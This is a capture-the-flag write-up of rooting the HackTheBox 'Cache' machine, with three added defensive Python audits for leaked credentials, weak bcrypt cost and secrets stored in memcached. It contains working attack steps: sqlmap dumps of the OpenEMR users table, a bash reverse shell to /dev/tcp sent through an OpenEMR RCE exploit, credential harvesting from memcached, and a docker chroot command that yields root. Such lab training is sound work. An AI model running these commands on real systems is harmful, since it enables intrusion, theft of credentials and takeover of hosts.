Cache HackTheBox Walkthrough
This is the Cache HackTheBox walkthrough. In this walkthrough I will demonstrate, step by step, how I rooted the Cache HackTheBox machine. Cache is a Linux machine with IP address 10.10.10.188 and is rated medium difficulty by its maker. Let's begin. Connect your machine to the VPN and confirm connectivity by pinging the IP 10.10.10.188.
I started by scanning the IP 10.10.10.188 to get a starting point.
Nmap [a popular port scanner] gave the following result.
$nmap -sV -sC -oA scan 10.10.10.188
Nmap revealed that ports 22, 80 and 30000 are open; among the services running on them are an Apache web server and Memcached [a general purpose distributed memory-caching system]. Visiting the URL http://10.10.10.188/author.html I found the name ash and added it to my notes, as it may be a user of the box. Nothing else interesting was found, so I tried directory brute forcing.
Directory brute forcing
$dirsearch -u 10.10.10.188 -e all -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
Directory brute forcing revealed two folders. From the file http://10.10.10.188/jquery/functionality.js found there I got the credential
ash: [email protected]_fun
I used the credential at the URL http://10.10.10.188/login.html. After login I found nothing interesting except an image of a magician.
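A credential sitting in a client-side script is exactly what a secret scan over static assets is meant to catch before deployment. The following is an added example, not code from the original post or from the box: a small Python scanner that reports string literals compared with or assigned to credential-named identifiers, run over a constructed JavaScript sample that mimics a client-side login check.

```python
import re

# Constructed sample (not the file from the box): a client-side login check that
# ships both the username and the password to every visitor's browser.
SAMPLE_JS = """\
$(function(){
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'example_pass_123'){
            alert("Password is not correct");
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "demo_user"){
            alert("Username is not correct");
        }
    }
});
"""

# Identifier fragments that usually name a credential.
CRED_NAME = r"(?:pass(?:word|wd)?|pwd|secret|token|api[_-]?key|user(?:name)?)"
PATTERNS = [
    # identifier compared with or assigned a quoted literal: Password != 'x', user = "y"
    re.compile(rf"\b(?P<name>\w*{CRED_NAME}\w*)\s*(?:[!=]==?|=)\s*(?P<q>['\"])(?P<val>[^'\"]+)(?P=q)", re.I),
    # the same comparison written the other way round: 'x' === apiKey
    re.compile(rf"(?P<q>['\"])(?P<val>[^'\"]+)(?P=q)\s*[!=]==?\s*(?P<name>\w*{CRED_NAME}\w*)", re.I),
]

def find_hardcoded_credentials(js_source):
    """Return (line_number, identifier, literal) for every suspicious literal."""
    findings = []
    for lineno, line in enumerate(js_source.splitlines(), 1):
        for pat in PATTERNS:
            for m in pat.finditer(line):
                findings.append((lineno, m.group("name"), m.group("val")))
    return findings

def scan_files(paths):
    """Scan JavaScript files on disk; returns {path: findings} for files with hits."""
    report = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            hits = find_hardcoded_credentials(fh.read())
        if hits:
            report[path] = hits
    return report
```

Pointing scan_files at a site's js/ directory in CI turns the functionality.js finding above into a build failure instead of a public credential.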
Next I tried to create a custom wordlist from the site using cewl.
Custom Wordlist Create
$cewl -w custom_wordlist.txt -d 10 -m 1 http://10.10.10.188/
Then I used wfuzz to fuzz for virtual host names with the custom wordlist we just created.
Fuzzing For domain
$ wfuzz -w custom_wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193
Got a 302 response at the word hms, so I added hms.htb to my /etc/hosts file; if virtual hosting is enabled we may get something more to enumerate.
Hosts file before modification
Hosts file after modification
Visiting http://hms.htb I found that it is running OpenEMR software [a medical practice management software which also supports Electronic Medical Records], and it redirected me to the login page http://hms.htb/interface/login/login.php?site=default. I tried to log in with the default credential admin: pass, but could not log in.
Tip: During CTF hunting and penetration testing, whenever you find a popular software or web app, always try to log in with its default credentials, because sometimes administrators forget to change them.
Whenever I find known software, my next step is to find its version so that I can look for public exploits. After a lot of enumeration I couldn't get its version. The footer of the login page at http://hms.htb/interface/login/login.php?site=default showed that the copyright information is outdated, so I am guessing that this software was last updated in 2018, and a public exploit from before 2018 may work on it. After looking at the release history it appears that the current version is 5.0.1 or lower.
As soon as I get the software name and its version, my next step is to find the available public exploits.
Searching Public Exploit
$searchsploit openemr 5.0.1
Searchsploit shows that there is an authenticated RCE, so we require a password for the OpenEMR software to get remote code execution. After some googling I found this file on the OpenEMR website, https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf, which reveals that OpenEMR 5.0.1 has multiple vulnerabilities, SQL injection among them. According to the PDF there is a GET-based SQL injection vulnerability at the URL http://hms.htb/portal/add_edit_event_user.php?eid=1. I recommend you read the PDF to learn more.
Dump username and password
Capture the request in a file named request.txt using Burp Suite, then run:
$sqlmap -r request.txt --dbs --batch
$sqlmap -r request.txt -D openemr --tables
$sqlmap -r request.txt -D openemr -T users_secure --dump
Got the credential
openemr_admin : $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
from the openemr database. After identifying the hash I found that it is bcrypt.
Cracked the hash using
$git clone https://github.com/BREAKTEAM/Debcrypt.git
So the credential is
openemr_admin: xxxxxx [six lowercase x's]
Tip: Always try to use a tool designed for the dedicated task rather than a general-purpose tool that does many things; this increases efficiency and accuracy. For example, to crack the bcrypt hash I used Debcrypt, a tool for cracking bcrypt hashes, rather than Hashcat or JohnTheRipper.
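The prefix of the dumped hash, $2a$05$, says more than "bcrypt": 05 is the cost parameter, and bcrypt runs 2^cost rounds, so this hash cost only 32 rounds per guess, which is why it cracked so quickly. Below is an added example, not from the original post or from OpenEMR: a Python audit that parses bcrypt hashes in modular-crypt format and flags any stored with a cost below 10 (the OWASP Password Storage Cheat Sheet minimum). The first sample row is the hash from the post; the other rows are constructed.

```python
import re

# bcrypt modular-crypt layout: $<variant>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)
MIN_COST = 10  # OWASP Password Storage Cheat Sheet minimum work factor for bcrypt

# Sample users_secure rows: the first hash is the one dumped from the box, the
# rest are constructed for illustration (neither is a real hash of anything).
SAMPLE_ROWS = [
    ("openemr_admin", "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."),
    ("strong_user", "$2b$12$abcdefghijklmnopqrstuv0123456789ABCDEFGHIJKLMNOPQRSTU"),
    ("legacy_user", "0123456789abcdef0123456789abcdef"),
]

def parse_bcrypt(hash_str):
    """Split a bcrypt string into its fields; raises ValueError if it is not one."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt hash")
    cost = int(m.group("cost"))
    if not 4 <= cost <= 31:  # the range bcrypt itself accepts
        raise ValueError(f"cost {cost} outside bcrypt range 4..31")
    return {"variant": m.group("variant"), "cost": cost,
            "rounds": 2 ** cost, "salt": m.group("salt")}

def audit_hashes(rows):
    """Return (user, cost, reason) for every row that is weak or not bcrypt at all."""
    findings = []
    for user, h in rows:
        try:
            info = parse_bcrypt(h)
        except ValueError as err:
            findings.append((user, None, str(err)))
            continue
        if info["cost"] < MIN_COST:
            findings.append((user, info["cost"],
                             f"cost {info['cost']} = {info['rounds']} rounds, below {MIN_COST}"))
    return findings

if __name__ == "__main__":
    for user, cost, reason in audit_hashes(SAMPLE_ROWS):
        print(f"{user}: {reason}")
```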
Since we already know that an authenticated RCE exploit exists for the OpenEMR software, let's use it by mirroring it to our PC from searchsploit.
$searchsploit openemr 5.0.1
$searchsploit -m exploits/php/webapps/45161.py
$mv 45161.py openemr_rce.py
$nc -nvlp 1234 // In a separate window
$python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c '/bin/bash -i >& /dev/tcp/10.10.14.44/1234 0>&1'
Upgrade the shell to a fully interactive Linux shell:
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm-256color
Found two users in the /home/ directory. Easily switched to user ash using
$su ash
and entering the credential we captured from the http://10.10.10.188/jquery/functionality.js file, i.e.,
Password: [email protected]_fun
Grab User Flag
I tried to run
$sudo -l
to check if ash has any special permissions, but got an error because user ash is not in the sudoers file. linpeas.sh [a post-exploitation enumeration script] revealed that user luffy is part of the docker group. Searching for docker privilege escalation I found a couple of interesting articles. The problem is that docker can only be run by user luffy, because luffy is in the docker group, and we can't switch to luffy using
$su luffy
because we don't have the credential. So we need the password of luffy. Wait, we have a memcached server running locally. Searching for penetration testing on memcached servers I found an article, followed the steps discussed in it, and got the credentials of luffy.
Remember that all of these steps need to be done on the remote Cache machine.
$netstat -alnop
revealed that the memcached server is listening on port 11211 locally, so we have to connect to it using telnet to get some information.
$telnet 127.0.0.1 11211
stats cachedump 1 0
So the credential is
luffy: 0n3_p1ec3. Exit from telnet and switch user to luffy.
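The reason this worked is that the application parked a plaintext username and password in memcached, where anyone who can reach port 11211 can list the keys with stats cachedump and read them back with get; memcached has no authentication of its own. As an added example (not from the original post or from the article it follows), here is a Python audit that parses those two memcached replies and flags credential-like keys, so the finding can be reproduced on a cache the defender owns; the transcript it runs on is constructed.

```python
import re

# Key names that should never hold a value in a shared cache.
SENSITIVE_KEY = re.compile(r"(pass(word|wd)?|pwd|secret|token|cred|session|user)", re.I)
# One line of a `stats cachedump <slab> <limit>` reply: ITEM <key> [<bytes> b; <exptime> s]
CACHEDUMP_LINE = re.compile(r"^ITEM (?P<key>\S+) \[(?P<size>\d+) b; (?P<exp>\d+) s\]$")

# Constructed transcript, not captured from the box.
DUMP_REPLY = ("ITEM link [21 b; 0 s]\r\nITEM user [5 b; 0 s]\r\nITEM passwd [9 b; 0 s]\r\n"
              "ITEM file [7 b; 0 s]\r\nITEM account [9 b; 0 s]\r\nEND\r\n")
GET_REPLY = "VALUE user 0 5\r\nalice\r\nVALUE passwd 0 9\r\nS3cr3t!pw\r\nEND\r\n"

def parse_cachedump(reply):
    """Return [{'key', 'size', 'exptime'}] from a cachedump reply; exptime 0 = never expires."""
    items = []
    for line in reply.split("\r\n"):
        if line == "END":
            break
        m = CACHEDUMP_LINE.match(line)
        if m:
            items.append({"key": m.group("key"), "size": int(m.group("size")),
                          "exptime": int(m.group("exp"))})
    return items

def parse_get(reply):
    """Return {key: data} from a (multi-key) get reply: VALUE <key> <flags> <bytes> / <data> / END."""
    values, lines, i = {}, reply.split("\r\n"), 0
    while i < len(lines) and lines[i] != "END":
        parts = lines[i].split()
        if len(parts) >= 4 and parts[0] == "VALUE":
            key, nbytes, data = parts[1], int(parts[3]), lines[i + 1]
            if len(data.encode()) != nbytes:
                raise ValueError(f"length mismatch for key {key}")
            values[key] = data
            i += 2
        else:
            i += 1
    return values

def audit_cache(items, values):
    """Flag credential-like keys; returns (key, value_or_None, reason)."""
    findings = []
    for item in items:
        if SENSITIVE_KEY.search(item["key"]):
            reason = "credential-like key name"
            if item["exptime"] == 0:
                reason += ", never expires"
            findings.append((item["key"], values.get(item["key"]), reason))
    return findings
```

A hit from audit_cache means the fix belongs in the application (stop caching secrets, or cache only an opaque session token with an expiry), not in the cache server.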
Then, as luffy, run
$docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
to get root.
Capture Root Flag
This is how I rooted the Cache machine. I learnt a lot during this challenge and hope you have learnt some new things too. If you have any issue, feel free to comment. If you want to give any suggestion, please write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com